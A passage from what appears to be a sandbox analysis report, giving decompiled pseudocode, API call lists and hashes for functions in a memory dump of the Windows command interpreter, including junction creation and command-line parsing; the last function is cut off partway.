                                    0x011f7391
                                    0x011f7393
                                    0x011f7393
                                    0x011f7396
                                    0x011f7399
                                    0x011f739e
                                    0x00000000
                                    0x00000000
                                    0x011f73ae
                                    0x011f73b0
                                    0x011f73b2
                                    0x011f73b7
                                    0x011f73b9
                                    0x011f73bc
                                    0x011f73c2
                                    0x011f73c4
                                    0x011f73c4
                                    0x011f73c7
                                    0x011f73ca
                                    0x011f73cf
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f73e1
                                    0x00000000
                                    0x00000000
                                    0x011f73e7
                                    0x011f7410
                                    0x011f73ef
                                    0x011f73f1
                                    0x011f73f4
                                    0x00000000
                                    0x00000000
                                    0x011f73fa
                                    0x011f73fc
                                    0x011f73fd
                                    0x011f7400
                                    0x011f7403
                                    0x011f7409
                                    0x011f740a
                                    0x011f740a
                                    0x00000000
                                    0x00000000
                                    0x011f7421
                                    0x00000000
                                    0x00000000
                                    0x011f7427
                                    0x011f742d
                                    0x011f7435
                                    0x011f7437
                                    0x011f7439
                                    0x011f7439
                                    0x011f743e
                                    0x011f7441
                                    0x011f7447
                                    0x011f7449
                                    0x011f7449
                                    0x011f744e
                                    0x011f7452
                                    0x011f7456
                                    0x011f7458
                                    0x011f7459
                                    0x011f745d
                                    0x011f745f
                                    0x011f7463
                                    0x011f7470
                                    0x00000000
                                    0x011f7476
                                    0x011f7476
                                    0x011f7478
                                    0x011f747c
                                    0x011f7486
                                    0x011f7489
                                    0x011f7490
                                    0x011f74b2
                                    0x011f7492
                                    0x011f7492
                                    0x011f7498
                                    0x011f7499
                                    0x011f749f
                                    0x011f74a0
                                    0x011f74a3
                                    0x011f74a4
                                    0x011f74aa
                                    0x011f74aa
                                    0x011f74bc
                                    0x011f750b
                                    0x011f755a
                                    0x011f7562
                                    0x011f7564
                                    0x011f7567
                                    0x011f756d
                                    0x011f756f
                                    0x011f756f
                                    0x011f7572
                                    0x011f7575
                                    0x011f757a
                                    0x011f750d
                                    0x011f7517
                                    0x00000000
                                    0x00000000
                                    0x011f751d
                                    0x011f7522
                                    0x011f7523
                                    0x011f7524
                                    0x011f7529
                                    0x011f752c
                                    0x011f752e
                                    0x011f7531
                                    0x011f7537
                                    0x011f7539
                                    0x011f7539
                                    0x011f753c
                                    0x011f753f
                                    0x011f7544
                                    0x011f7544
                                    0x00000000
                                    0x011f750b
                                    0x00000000
                                    0x011f72a9
                                    0x011f7263
                                    0x011f7272
                                    0x011f7277
                                    0x011f727a
                                    0x011f727f
                                    0x011f7287
                                    0x011f7287
                                    0x011f728a
                                    0x011f728d
                                    0x011f7292
                                    0x00000000
                                    0x011f7292
                                    0x011f7239
                                    0x00000000
                                    0x011f7239
                                    0x011f716a
                                    0x011f716f
                                    0x011f7172
                                    0x011f7174
                                    0x011f7177
                                    0x011f717d
                                    0x011f717f
                                    0x011f717f
                                    0x011f7182
                                    0x011f7185
                                    0x011f7190
                                    0x011f7192
                                    0x011f7195
                                    0x011f719b
                                    0x011f719d
                                    0x011f71aa
                                    0x011f71dc
                                    0x011f71dc
                                    0x00000000
                                    0x011f71dc
                                    0x011f71b5
                                    0x011f71c4
                                    0x011f71da
                                    0x00000000
                                    0x011f71da
                                    0x011f71cf
                                    0x00000000
                                    0x011f71cf
                                    0x00000000
                                    0x011f714c
                                    0x011f7112

                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(2833377E,?,00000000), ref: 011F7062
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7074
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • towupper.MSVCRT ref: 011F720E
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F7343
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,011D1EB4,011D3958), ref: 011F7467
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,2833377E,?,00000000), ref: 011F765F
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                    • String ID: %s $%s>$PROMPT$Unknown
                                    • API String ID: 708651206-3050974680
                                    • Opcode ID: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction ID: 95f026a0171d62c6cfe02235972da7af9d2101779e45c98b7c33a3d9a86c882d
                                    • Opcode Fuzzy Hash: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction Fuzzy Hash: 3A02D479A011169BDF3CDF28D84D6BAB7B6FF54304F04829EE909E7294EB305A81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB5E0, Relevance: 19.7, APIs: 13, Instructions: 180filememorynativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E011FB5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E011FB51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E011FB51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E011FB9D3(_t91, 0, 1) != 0) {
						if(E011FB91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E011E00B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L19;
					}
					_push(0x4000272e);
					goto L4;
				}
			}






























                                    0x011fb5ea
                                    0x011fb5f1
                                    0x011fb5f4
                                    0x011fb5f5
                                    0x011fb5fb
                                    0x011fb5fe
                                    0x011fb609
                                    0x011fb610
                                    0x011fb614
                                    0x011fb7a2
                                    0x011fb7a6
                                    0x011fb7b7
                                    0x011fb7b7
                                    0x011fb7bf
                                    0x011fb7c8
                                    0x011fb7c8
                                    0x011fb7d6
                                    0x011fb622
                                    0x011fb62e
                                    0x011fb649
                                    0x011fb65e
                                    0x00000000
                                    0x00000000
                                    0x011fb666
                                    0x011fb679
                                    0x011fb67f
                                    0x011fb685
                                    0x00000000
                                    0x00000000
                                    0x011fb694
                                    0x011fb69a
                                    0x011fb69c
                                    0x011fb69c
                                    0x011fb69f
                                    0x011fb69f
                                    0x011fb6a2
                                    0x011fb6a5
                                    0x011fb6bb
                                    0x011fb6be
                                    0x011fb6c3
                                    0x011fb6c8
                                    0x011fb798
                                    0x011fb79b
                                    0x011fb79c
                                    0x00000000
                                    0x011fb79c
                                    0x011fb6d5
                                    0x011fb6da
                                    0x011fb6e6
                                    0x011fb6ef
                                    0x011fb6f5
                                    0x011fb6fd
                                    0x011fb70a
                                    0x011fb70f
                                    0x011fb715
                                    0x011fb71e
                                    0x011fb721
                                    0x011fb723
                                    0x011fb727
                                    0x011fb72a
                                    0x011fb72d
                                    0x011fb72d
                                    0x011fb730
                                    0x011fb733
                                    0x011fb73e
                                    0x011fb741
                                    0x011fb756
                                    0x011fb75e
                                    0x011fb778
                                    0x011fb780
                                    0x011fb794
                                    0x011fb782
                                    0x011fb78a
                                    0x011fb78a
                                    0x00000000
                                    0x011fb780
                                    0x011fb64b
                                    0x011fb635
                                    0x011fb635
                                    0x00000000
                                    0x011fb635
                                    0x011fb630
                                    0x00000000
                                    0x011fb630

                                    APIs
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 011FB533
                                      • Part of subcall function 011FB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 011FB54F
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 011FB560
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 011FB635
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 011FB656
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 011FB679
                                    • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 011FB694
                                    • memset.MSVCRT ref: 011FB6D5
                                    • memcpy.MSVCRT ref: 011FB70A
                                    • memcpy.MSVCRT ref: 011FB756
                                    • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 011FB778
                                    • RtlNtStatusToDosError.NTDLL ref: 011FB783
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011FB78A
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011FB79C
                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 011FB7B7
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB7C8
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA0F
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011FB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                      • Part of subcall function 011FB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                      • Part of subcall function 011FB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                    • String ID:
                                    • API String ID: 223857506-0
                                    • Opcode ID: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction ID: 3b7fc173a566e4ec8d63d451b9b672e8c641dadc770bbcaf787c64c05c6bfcb5
                                    • Opcode Fuzzy Hash: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction Fuzzy Hash: B951C270A00605AFDB19DFB8CC58ABFB7B8EF48204F08412DEA06E7250EB359941CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E011DE040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E011E0C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0x1213cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0x11d1628;
						do {
							_t24 = _t150 - 8; // 0x11d35b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0x1213cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0x11fd0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E011DDFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E011DD7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E011E00B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E011F9287(_t136);
													__imp__longjmp(0x120b8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E011E1040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E011E18C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0x11d1a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}




















































                                    0x011de040
                                    0x011de04b
                                    0x011de052
                                    0x011de063
                                    0x011de069
                                    0x011de06b
                                    0x011de075
                                    0x011de07b
                                    0x011de07e
                                    0x011de085
                                    0x011de089
                                    0x011de090
                                    0x011de095
                                    0x011de09c
                                    0x011ebd1d
                                    0x011de0a2
                                    0x011de0a2
                                    0x011de0a2
                                    0x011de0a8
                                    0x011de0b5
                                    0x011ebd27
                                    0x00000000
                                    0x011de0bb
                                    0x011de0bb
                                    0x011de0c0
                                    0x011de0cb
                                    0x011de0cf
                                    0x011de0d4
                                    0x011de212
                                    0x011de21a
                                    0x011de21d
                                    0x011de225
                                    0x011de310
                                    0x011de22b
                                    0x011de22b
                                    0x011de22b
                                    0x011de0e5
                                    0x011de0e7
                                    0x011de100
                                    0x011de103
                                    0x011de11c
                                    0x011de11c
                                    0x011de121
                                    0x011ebd31
                                    0x011ebd31
                                    0x011de127
                                    0x011de12b
                                    0x011de12c
                                    0x00000000
                                    0x011de12c
                                    0x011de10b
                                    0x011de111
                                    0x011de116
                                    0x011de2d8
                                    0x00000000
                                    0x00000000
                                    0x011de2de
                                    0x011de2de
                                    0x00000000
                                    0x011de0ed
                                    0x011de0f3
                                    0x011de0f9
                                    0x011de0fe
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011de0fe
                                    0x011de0e7
                                    0x011de0dd
                                    0x00000000
                                    0x00000000
                                    0x011de0df
                                    0x00000000
                                    0x011de0df
                                    0x011de134
                                    0x011de13c
                                    0x011ebd3c
                                    0x011de1ea
                                    0x011de1ed
                                    0x011de208
                                    0x011de208
                                    0x011de142
                                    0x011de147
                                    0x011ebd44
                                    0x011ebd44
                                    0x011de14f
                                    0x011de156
                                    0x011de2e5
                                    0x011de2ea
                                    0x011de328
                                    0x011de328
                                    0x011de2ed
                                    0x011de2f6
                                    0x011de320
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011de2f8
                                    0x011de2f8
                                    0x011de2f8
                                    0x011de2fb
                                    0x011de303
                                    0x011de330
                                    0x011de330
                                    0x011de307
                                    0x00000000
                                    0x011de307
                                    0x011de15c
                                    0x011de15c
                                    0x011de15c
                                    0x011de161
                                    0x011ebd4f
                                    0x011ebd4f
                                    0x011de167
                                    0x011de169
                                    0x011de170
                                    0x011de170
                                    0x011de170
                                    0x011de175
                                    0x00000000
                                    0x00000000
                                    0x011de179
                                    0x011de17f
                                    0x011de184
                                    0x011de19d
                                    0x011de1a2
                                    0x011ebd61
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ebd67
                                    0x011de1a8
                                    0x011de1a8
                                    0x011de1ae
                                    0x011de1b1
                                    0x011de1b1
                                    0x011de1ba
                                    0x011de237
                                    0x011ebd6c
                                    0x011ebd6c
                                    0x011de23e
                                    0x011de24b
                                    0x011ebd77
                                    0x011de251
                                    0x011de251
                                    0x011de258
                                    0x011de260
                                    0x011de269
                                    0x011de270
                                    0x00000000
                                    0x00000000
                                    0x011de272
                                    0x011de277
                                    0x011de2b8
                                    0x011de2c0
                                    0x011de2c3
                                    0x011de2cb
                                    0x011de317
                                    0x011de2cd
                                    0x011de2cd
                                    0x011de2cd
                                    0x011de279
                                    0x011de279
                                    0x011de279
                                    0x011de281
                                    0x011de288
                                    0x00000000
                                    0x00000000
                                    0x011de28b
                                    0x011de291
                                    0x011de296
                                    0x00000000
                                    0x00000000
                                    0x011de29a
                                    0x011de2a6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011de283
                                    0x011de283
                                    0x011de283
                                    0x00000000
                                    0x011de283
                                    0x011de281
                                    0x011de2ad
                                    0x011de1cd
                                    0x011de1cd
                                    0x011de1d0
                                    0x011de1d0
                                    0x011de1d3
                                    0x011de1d3
                                    0x011de1d6
                                    0x011de1d9
                                    0x011de1e0
                                    0x011de1e4
                                    0x011ebd87
                                    0x011ebd87
                                    0x011ebd8a
                                    0x011ebd8f
                                    0x011ebda5
                                    0x011ebdad
                                    0x011ebdaf
                                    0x011ebdb7
                                    0x011ebdb9
                                    0x011ebdc5
                                    0x011ebdc5
                                    0x011ebdd1
                                    0x011ebdd3
                                    0x011ebddb
                                    0x011ebde6
                                    0x011ebdeb
                                    0x011ebdff
                                    0x011ebded
                                    0x011ebded
                                    0x011ebdef
                                    0x011ebdf8
                                    0x011ebdf8
                                    0x011ebe05
                                    0x011ebe0d
                                    0x011ebe13
                                    0x00000000
                                    0x011ebe13
                                    0x011ebd91
                                    0x011ebd94
                                    0x011ebd94
                                    0x011ebd97
                                    0x011ebd9a
                                    0x011ebda3
                                    0x00000000
                                    0x011ebda3
                                    0x011de1e4
                                    0x00000000
                                    0x011de24b
                                    0x011de1bc
                                    0x011de1c2
                                    0x011de1cb
                                    0x011de209
                                    0x011de209
                                    0x00000000
                                    0x011de1cb
                                    0x011de186
                                    0x011de186
                                    0x011de189
                                    0x011de18a
                                    0x011de192
                                    0x011de198
                                    0x00000000
                                    0x011de198
                                    0x011de156

                                    APIs
                                    • memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • wcschr.MSVCRT ref: 011DE0F3
                                    • wcschr.MSVCRT ref: 011DE10B
                                    • _wcsicmp.MSVCRT ref: 011DE179
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE1ED
                                    • iswspace.MSVCRT ref: 011DE28B
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 011DE2ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                    • String ID: :.\$=,;$=,;+/[] "
                                    • API String ID: 313872294-843887632
                                    • Opcode ID: 007c7f30d5d94d735cbdac762c08c37ab33b6a0c84e2a388316583db0c9ec13a
                                    • Instruction ID: 020e0d1f864e88efa5b65822288a6ff789fc979fe5341ce17d0df71a42164fea
                                    • Opcode Fuzzy Hash: 007c7f30d5d94d735cbdac762c08c37ab33b6a0c84e2a388316583db0c9ec13a
                                    • Instruction Fuzzy Hash: 4FA1E730B062159BDF2CCBACD888BFE7BB1AF45319F050198D916AB291DB319D85CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB89C, Relevance: 18.3, APIs: 12, Instructions: 257COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E011DB89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0x11fd0b4; // 0x2833377e
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
